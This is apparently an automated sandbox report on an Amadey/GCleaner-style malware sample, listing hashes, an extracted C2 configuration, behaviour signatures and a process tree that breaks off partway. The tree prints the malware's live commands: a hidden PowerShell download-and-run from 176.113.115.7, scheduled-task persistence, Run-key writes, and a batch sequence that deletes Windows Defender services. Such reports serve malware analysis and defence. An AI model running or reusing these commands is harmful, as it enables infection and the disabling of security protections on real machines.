Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    27/03/2025, 18:31

General

  • Target

    f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b.exe

  • Size

    938KB

  • MD5

    5ec95a42b16d80c72d17cc6d0bac58de

  • SHA1

    9cfd9221606e1acfef1ea5f6f4bf88080822d5db

  • SHA256

    f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b

  • SHA512

    ca64237e9b54295b3162e26808d6c9acbef0640a996534425e21898b456e5117142bfe4d30473d2573ef42d08f0a85475d1cab63153e7b1b573011f67f735f0b

  • SSDEEP

    24576:dqDEvCTbMWu7rQYlBQcBiT6rprG8a0Xu:dTvC/MTQYxsWR7a0X

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 29 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 4 TTPs
  • Uses browser remote debugging 2 TTPs 8 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 39 IoCs
  • Identifies Wine through registry keys 2 TTPs 12 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 9 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 46 IoCs
  • Drops file in Windows directory 18 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 5 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies registry class 6 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 50 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b.exe
    "C:\Users\Admin\AppData\Local\Temp\f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b.exe"
    1⤵
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2704
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn pBQfSmaf37Z /tr "mshta C:\Users\Admin\AppData\Local\Temp\orcUglzGT.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2724
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn pBQfSmaf37Z /tr "mshta C:\Users\Admin\AppData\Local\Temp\orcUglzGT.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2716
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\orcUglzGT.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2776
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'C02BPNYY3N3RGAOMO90HZUAHBV6JAY7O.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2728
        • C:\Users\Admin\AppData\Local\TempC02BPNYY3N3RGAOMO90HZUAHBV6JAY7O.EXE
          "C:\Users\Admin\AppData\Local\TempC02BPNYY3N3RGAOMO90HZUAHBV6JAY7O.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2068
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1580
            • C:\Users\Admin\AppData\Local\Temp\10345240101\EPTwCQd.exe
              "C:\Users\Admin\AppData\Local\Temp\10345240101\EPTwCQd.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2140
              • C:\Windows\system32\WerFault.exe
                C:\Windows\system32\WerFault.exe -u -p 2140 -s 36
                7⤵
                • Loads dropped DLL
                PID:2112
            • C:\Users\Admin\AppData\Local\Temp\10347640101\q4jfn3p.exe
              "C:\Users\Admin\AppData\Local\Temp\10347640101\q4jfn3p.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2964
              • C:\Windows\system32\WerFault.exe
                C:\Windows\system32\WerFault.exe -u -p 2964 -s 36
                7⤵
                • Loads dropped DLL
                PID:292
            • C:\Users\Admin\AppData\Local\Temp\10351780101\apple.exe
              "C:\Users\Admin\AppData\Local\Temp\10351780101\apple.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:960
              • C:\Users\Admin\AppData\Local\Temp\22.exe
                "C:\Users\Admin\AppData\Local\Temp\22.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1000
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6FD3.tmp\6FD4.tmp\6FD5.bat C:\Users\Admin\AppData\Local\Temp\22.exe"
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1992
                  • C:\Users\Admin\AppData\Local\Temp\22.exe
                    "C:\Users\Admin\AppData\Local\Temp\22.exe" go
                    9⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                    • Suspicious use of WriteProcessMemory
                    PID:1712
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7011.tmp\7012.tmp\7013.bat C:\Users\Admin\AppData\Local\Temp\22.exe go"
                      10⤵
                      • Drops file in Program Files directory
                      • Suspicious use of WriteProcessMemory
                      PID:2500
                      • C:\Windows\system32\sc.exe
                        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                        11⤵
                        • Launches sc.exe
                        PID:3000
                      • C:\Windows\system32\sc.exe
                        sc start ddrver
                        11⤵
                        • Launches sc.exe
                        PID:2356
                      • C:\Windows\system32\timeout.exe
                        timeout /t 1
                        11⤵
                        • Delays execution with timeout.exe
                        PID:2264
                      • C:\Windows\system32\sc.exe
                        sc stop ddrver
                        11⤵
                        • Launches sc.exe
                        PID:2400
                      • C:\Windows\system32\sc.exe
                        sc start ddrver
                        11⤵
                        • Launches sc.exe
                        PID:2056
                      • C:\Windows\system32\takeown.exe
                        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                        11⤵
                        • Possible privilege escalation attempt
                        • Modifies file permissions
                        PID:2348
                      • C:\Windows\system32\icacls.exe
                        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                        11⤵
                        • Possible privilege escalation attempt
                        • Modifies file permissions
                        PID:3068
                      • C:\Windows\system32\sc.exe
                        sc stop "WinDefend"
                        11⤵
                        • Launches sc.exe
                        PID:308
                      • C:\Windows\system32\sc.exe
                        sc delete "WinDefend"
                        11⤵
                        • Launches sc.exe
                        PID:2456
                      • C:\Windows\system32\reg.exe
                        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                        11⤵
                          PID:1476
                        • C:\Windows\system32\sc.exe
                          sc stop "MDCoreSvc"
                          11⤵
                          • Launches sc.exe
                          PID:2440
                        • C:\Windows\system32\sc.exe
                          sc delete "MDCoreSvc"
                          11⤵
                          • Launches sc.exe
                          PID:2528
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                          11⤵
                            PID:1084
                          • C:\Windows\system32\sc.exe
                            sc stop "WdNisSvc"
                            11⤵
                            • Launches sc.exe
                            PID:2436
                          • C:\Windows\system32\sc.exe
                            sc delete "WdNisSvc"
                            11⤵
                            • Launches sc.exe
                            PID:1064
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                            11⤵
                              PID:1088
                            • C:\Windows\system32\sc.exe
                              sc stop "Sense"
                              11⤵
                              • Launches sc.exe
                              PID:1736
                            • C:\Windows\system32\sc.exe
                              sc delete "Sense"
                              11⤵
                              • Launches sc.exe
                              PID:2524
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                              11⤵
                                PID:1740
                              • C:\Windows\system32\sc.exe
                                sc stop "wscsvc"
                                11⤵
                                • Launches sc.exe
                                PID:2168
                              • C:\Windows\system32\sc.exe
                                sc delete "wscsvc"
                                11⤵
                                • Launches sc.exe
                                PID:1328
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                11⤵
                                  PID:1728
                                • C:\Windows\system32\sc.exe
                                  sc stop "SgrmBroker"
                                  11⤵
                                  • Launches sc.exe
                                  PID:1688
                                • C:\Windows\system32\sc.exe
                                  sc delete "SgrmBroker"
                                  11⤵
                                  • Launches sc.exe
                                  PID:2704
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                  11⤵
                                    PID:1548
                                  • C:\Windows\system32\sc.exe
                                    sc stop "SecurityHealthService"
                                    11⤵
                                    • Launches sc.exe
                                    PID:2496
                                  • C:\Windows\system32\sc.exe
                                    sc delete "SecurityHealthService"
                                    11⤵
                                    • Launches sc.exe
                                    PID:1704
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                    11⤵
                                      PID:2812
                                    • C:\Windows\system32\sc.exe
                                      sc stop "webthreatdefsvc"
                                      11⤵
                                      • Launches sc.exe
                                      PID:840
                                    • C:\Windows\system32\sc.exe
                                      sc delete "webthreatdefsvc"
                                      11⤵
                                      • Launches sc.exe
                                      PID:2716
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                      11⤵
                                        PID:2724
                                      • C:\Windows\system32\sc.exe
                                        sc stop "webthreatdefusersvc"
                                        11⤵
                                        • Launches sc.exe
                                        PID:2780
                                      • C:\Windows\system32\sc.exe
                                        sc delete "webthreatdefusersvc"
                                        11⤵
                                        • Launches sc.exe
                                        PID:2720
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                        11⤵
                                          PID:2772
                                        • C:\Windows\system32\sc.exe
                                          sc stop "WdNisDrv"
                                          11⤵
                                          • Launches sc.exe
                                          PID:2868
                                        • C:\Windows\system32\sc.exe
                                          sc delete "WdNisDrv"
                                          11⤵
                                          • Launches sc.exe
                                          PID:3028
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                          11⤵
                                            PID:1508
                                          • C:\Windows\system32\sc.exe
                                            sc stop "WdBoot"
                                            11⤵
                                            • Launches sc.exe
                                            PID:2784
                                          • C:\Windows\system32\sc.exe
                                            sc delete "WdBoot"
                                            11⤵
                                            • Launches sc.exe
                                            PID:2556
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                            11⤵
                                              PID:2888
                                            • C:\Windows\system32\sc.exe
                                              sc stop "WdFilter"
                                              11⤵
                                              • Launches sc.exe
                                              PID:1732
                                            • C:\Windows\system32\sc.exe
                                              sc delete "WdFilter"
                                              11⤵
                                              • Launches sc.exe
                                              PID:2944
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                              11⤵
                                                PID:2584
                                              • C:\Windows\system32\sc.exe
                                                sc stop "SgrmAgent"
                                                11⤵
                                                • Launches sc.exe
                                                PID:2676
                                              • C:\Windows\system32\sc.exe
                                                sc delete "SgrmAgent"
                                                11⤵
                                                • Launches sc.exe
                                                PID:2748
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                                11⤵
                                                  PID:2612
                                                • C:\Windows\system32\sc.exe
                                                  sc stop "MsSecWfp"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:2796
                                                • C:\Windows\system32\sc.exe
                                                  sc delete "MsSecWfp"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:2408
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                  11⤵
                                                    PID:2072
                                                  • C:\Windows\system32\sc.exe
                                                    sc stop "MsSecFlt"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:1452
                                                  • C:\Windows\system32\sc.exe
                                                    sc delete "MsSecFlt"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:2908
                                                  • C:\Windows\system32\reg.exe
                                                    reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                    11⤵
                                                      PID:2836
                                                    • C:\Windows\system32\sc.exe
                                                      sc stop "MsSecCore"
                                                      11⤵
                                                      • Launches sc.exe
                                                      PID:1808
                                                    • C:\Windows\system32\sc.exe
                                                      sc delete "MsSecCore"
                                                      11⤵
                                                      • Launches sc.exe
                                                      PID:1108
                                                    • C:\Windows\system32\reg.exe
                                                      reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                      11⤵
                                                        PID:2824
                                                      • C:\Windows\system32\schtasks.exe
                                                        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                        11⤵
                                                          PID:1664
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                          11⤵
                                                            PID:2176
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                            11⤵
                                                              PID:2104
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                              11⤵
                                                                PID:1152
                                                              • C:\Windows\system32\sc.exe
                                                                sc stop ddrver
                                                                11⤵
                                                                • Launches sc.exe
                                                                PID:1984
                                                              • C:\Windows\system32\sc.exe
                                                                sc delete ddrver
                                                                11⤵
                                                                • Launches sc.exe
                                                                PID:2284
                                                    • C:\Users\Admin\AppData\Local\Temp\10352530101\amnew.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10352530101\amnew.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Drops file in Windows directory
                                                      • Suspicious use of FindShellTrayWindow
                                                      PID:1320
                                                      • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                                                        7⤵
                                                        • Downloads MZ/PE file
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Adds Run key to start application
                                                        • System Location Discovery: System Language Discovery
                                                        • Modifies system certificate store
                                                        PID:1956
                                                        • C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          PID:1000
                                                          • C:\Windows\system32\WerFault.exe
                                                            C:\Windows\system32\WerFault.exe -u -p 1000 -s 36
                                                            9⤵
                                                            • Loads dropped DLL
                                                            PID:1856
                                                        • C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          PID:2016
                                                          • C:\Windows\system32\WerFault.exe
                                                            C:\Windows\system32\WerFault.exe -u -p 2016 -s 36
                                                            9⤵
                                                            • Loads dropped DLL
                                                            PID:540
                                                        • C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          PID:1716
                                                          • C:\Windows\system32\WerFault.exe
                                                            C:\Windows\system32\WerFault.exe -u -p 1716 -s 36
                                                            9⤵
                                                            • Loads dropped DLL
                                                            PID:1152
                                                        • C:\Users\Admin\AppData\Local\Temp\10041590101\crypted.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10041590101\crypted.exe"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          PID:2224
                                                          • C:\Windows\system32\WerFault.exe
                                                            C:\Windows\system32\WerFault.exe -u -p 2224 -s 36
                                                            9⤵
                                                            • Loads dropped DLL
                                                            PID:2848
                                                        • C:\Users\Admin\AppData\Local\Temp\10041600101\please18.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10041600101\please18.exe"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1380
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "cmd" /c ping 127.0.0.1 -n 8 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "key" /t REG_SZ /d "C:\Users\Admin\AppData\Local\key.exe"
                                                            9⤵
                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                            PID:1936
                                                            • C:\Windows\SysWOW64\PING.EXE
                                                              ping 127.0.0.1 -n 8
                                                              10⤵
                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                              • Runs ping.exe
                                                              PID:480
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "key" /t REG_SZ /d "C:\Users\Admin\AppData\Local\key.exe"
                                                              10⤵
                                                              • Adds Run key to start application
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2948
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "cmd" /c ping 127.0.0.1 -n 14 > nul && copy "C:\Users\Admin\AppData\Local\Temp\10041600101\please18.exe" "C:\Users\Admin\AppData\Local\key.exe" && ping 127.0.0.1 -n 14 > nul && "C:\Users\Admin\AppData\Local\key.exe"
                                                            9⤵
                                                            • System Location Discovery: System Language Discovery
                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                            PID:1476
                                                            • C:\Windows\SysWOW64\PING.EXE
                                                              ping 127.0.0.1 -n 14
                                                              10⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                              • Runs ping.exe
                                                              PID:2504
                                                            • C:\Windows\SysWOW64\PING.EXE
                                                              ping 127.0.0.1 -n 14
                                                              10⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                              • Runs ping.exe
                                                              PID:1240
                                                            • C:\Users\Admin\AppData\Local\key.exe
                                                              "C:\Users\Admin\AppData\Local\key.exe"
                                                              10⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:3000
                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                11⤵
                                                                  PID:2692
                                                          • C:\Users\Admin\AppData\Local\Temp\10041870101\39d98e1183.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10041870101\39d98e1183.exe"
                                                            8⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Loads dropped DLL
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Suspicious use of SetThreadContext
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:2016
                                                            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10041870101\39d98e1183.exe"
                                                              9⤵
                                                              • Downloads MZ/PE file
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:892
                                                          • C:\Users\Admin\AppData\Local\Temp\10041880101\0072a722b6.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10041880101\0072a722b6.exe"
                                                            8⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Suspicious use of SetThreadContext
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:1308
                                                            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10041880101\0072a722b6.exe"
                                                              9⤵
                                                              • Downloads MZ/PE file
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2512
                                                      • C:\Users\Admin\AppData\Local\Temp\10352660101\fd62741060.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10352660101\fd62741060.exe"
                                                        6⤵
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Identifies Wine through registry keys
                                                        • Loads dropped DLL
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • Suspicious use of SetThreadContext
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:1072
                                                        • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10352660101\fd62741060.exe"
                                                          7⤵
                                                          • Downloads MZ/PE file
                                                          • Executes dropped EXE
                                                          • System Location Discovery: System Language Discovery
                                                          PID:2620
                                                      • C:\Users\Admin\AppData\Local\Temp\10352670101\ca240bb7a9.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10352670101\ca240bb7a9.exe"
                                                        6⤵
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Identifies Wine through registry keys
                                                        • Loads dropped DLL
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • Suspicious use of SetThreadContext
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:404
                                                        • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10352670101\ca240bb7a9.exe"
                                                          7⤵
                                                          • Downloads MZ/PE file
                                                          • Executes dropped EXE
                                                          • System Location Discovery: System Language Discovery
                                                          PID:2972
                                                      • C:\Users\Admin\AppData\Local\Temp\10352680101\171d7e35c5.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10352680101\171d7e35c5.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:1084
                                                        • C:\Windows\system32\WerFault.exe
                                                          C:\Windows\system32\WerFault.exe -u -p 1084 -s 64
                                                          7⤵
                                                          • Loads dropped DLL
                                                          PID:2688
                                                      • C:\Users\Admin\AppData\Local\Temp\10352690101\7b35p_003.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10352690101\7b35p_003.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        PID:2696
                                                      • C:\Users\Admin\AppData\Local\Temp\10352700101\EPTwCQd.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10352700101\EPTwCQd.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:1364
                                                        • C:\Windows\system32\WerFault.exe
                                                          C:\Windows\system32\WerFault.exe -u -p 1364 -s 36
                                                          7⤵
                                                            PID:2780
                                                        • C:\Users\Admin\AppData\Local\Temp\10352710101\7IIl2eE.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10352710101\7IIl2eE.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Drops file in Windows directory
                                                          PID:1472
                                                          • C:\Windows\SysWOW64\CMD.exe
                                                            "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                                                            7⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2928
                                                            • C:\Windows\SysWOW64\tasklist.exe
                                                              tasklist
                                                              8⤵
